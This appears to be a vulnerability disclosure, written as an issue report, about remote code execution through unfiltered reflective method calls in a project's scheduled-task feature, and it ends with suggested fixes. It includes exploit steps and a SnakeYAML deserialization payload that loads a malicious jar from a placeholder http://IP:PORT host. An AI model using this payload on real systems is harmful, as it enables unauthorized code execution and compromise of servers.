[vulnerability] Remote Code Execute

[c41ico]

1. Steps to reproduce

Using the project https://github.com/artsploit/yaml-payload, modify AwesomeScriptEngineFactory.java as follows

Building and package, moveyaml-payload.jar into the root directory of the web service

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

When using the Scheduled Tasks feature, the call string will always contain symbols such as brackets and quotes, however, the XSSFilter in the program will convert these symbols to other characters, making the Scheduled Tasks feature completely unusable. So we need to whitelist the XSSFilter in application.yml for routes related to the scheduled tasks

A new scheduled task is created as follows

调用目标字符串 field is org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')

Execute this task after submission to remotely execute arbitrarily code

2. Expected behavior

The com.aurora.util.JobInvokeUtil#invokeMethod method is used to reflectively execute the specified method of the given class

3. Actual behavior

However, there is no filtering of incoming class names and method names in this method, resulting in dangerous class names and method names being passed in and executed

4. Affected Version

v2

5. Fixes Recommendations

1. Filter dangerous class names
2. Filter unnecessary protocols such as http, rmi, etc.